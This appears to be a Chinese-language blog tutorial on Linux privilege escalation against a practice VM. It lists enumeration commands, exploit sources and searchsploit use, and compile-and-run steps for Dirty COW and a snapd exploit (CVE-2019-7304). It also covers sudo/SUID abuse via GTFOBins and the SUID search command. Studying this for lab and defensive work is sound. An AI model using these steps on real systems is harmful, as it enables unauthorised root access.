linux信息收集与提权

发布于:2024-07-14 ⋅ 阅读:(150) ⋅ 点赞:(0)

目录

版本信息收集 

 kali得一些exp网站

kali自带的searchsploit工具 

脏牛提权漏洞(改写没有写权限的文件)

测试靶场下载链接

sudo提权

上传恶意C脚本进行编译生成dirty的elf文件,也可以在攻击机编译好上传 

启动,123456是设置的密码 

​修改的攻击工作完成,成功降下cpu​

攻击失败,多次尝试就行

​本地提权 

CVE-2019-7304

开始攻击

攻击成功 

CVE-2021-3493

攻击成功

滥用的sudo权限

普通用户的sudo滥用提权​

 通过find搜索进行sudo提权

SUID提权

切换到普通用户更改文件时的root用户瞬间,因为有的普通用户文件属主为root,是配置不当导致的

SUID权限说明

找具有suid的权限的文件命令

和sudo滥用的方式一样,在网站找suid 

 提权成功


版本信息收集 

# 查看发行版本
cat /etc/issue
cat /etc/*-release
lsb_release -a

# 查看内核版本
uname -a
uname -mrs

 kali得一些exp网站

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合icon-default.png?t=N7T8https://github.com/SecWiki/linux-kernel-exploits


https://www.exploit-db.com/exploits/icon-default.png?t=N7T8https://www.exploit-db.com/exploits/

kali自带的searchsploit工具 

searchsploit privilege | grep -i linux | grep -i kernel 

脏牛提权漏洞(改写没有写权限的文件)

测试靶场下载链接

https://in.security/downloads/lin.security_v1.0.ovaicon-default.png?t=N7T8https://in.security/downloads/lin.security_v1.0.ova

sudo提权

知道密码的情况

 分配ip,ssh准备连接

dhclient  #分配个ip

有ip了,可以连接ssh了 

上传恶意C脚本进行编译生成dirty的elf文件,也可以在攻击机编译好上传 

gcc -pthread dirty.c -o dirty -lcrypt

启动,123456是设置的密码 

./dirty 123456

 修改的攻击工作完成,成功降下cpu

攻击失败,多次尝试就行

本地提权 

CVE-2019-7304

开始攻击

python3 dirty_sockv2.py

攻击成功 

CVE-2021-3493

攻击成功

滥用的sudo权限

普通用户的sudo滥用提权

 通过find搜索进行sudo提权

GTFOBinsicon-default.png?t=N7T8https://gtfobins.github.io/

SUID提权

切换到普通用户更改文件时的root用户瞬间,因为有的普通用户文件属主为root,是配置不当导致的

SUID权限说明

  1. 启动为进程之后,其进程的属主为原程序文件的属主
  2. 只能作用在二进制程序上,不能作用在脚本上,且设置在目录上无意义
  3. 执行suid权限的程序时,此用户将继承此程序的所有者权限

找具有suid的权限的文件命令

find / -perm -u=s -type f 2>/dev/null

和sudo滥用的方式一样,在网站找suid 

 GTFOBinsicon-default.png?t=N7T8https://gtfobins.github.io/

 

 提权成功


网站公告

今日签到

点亮在社区的每一天
去签到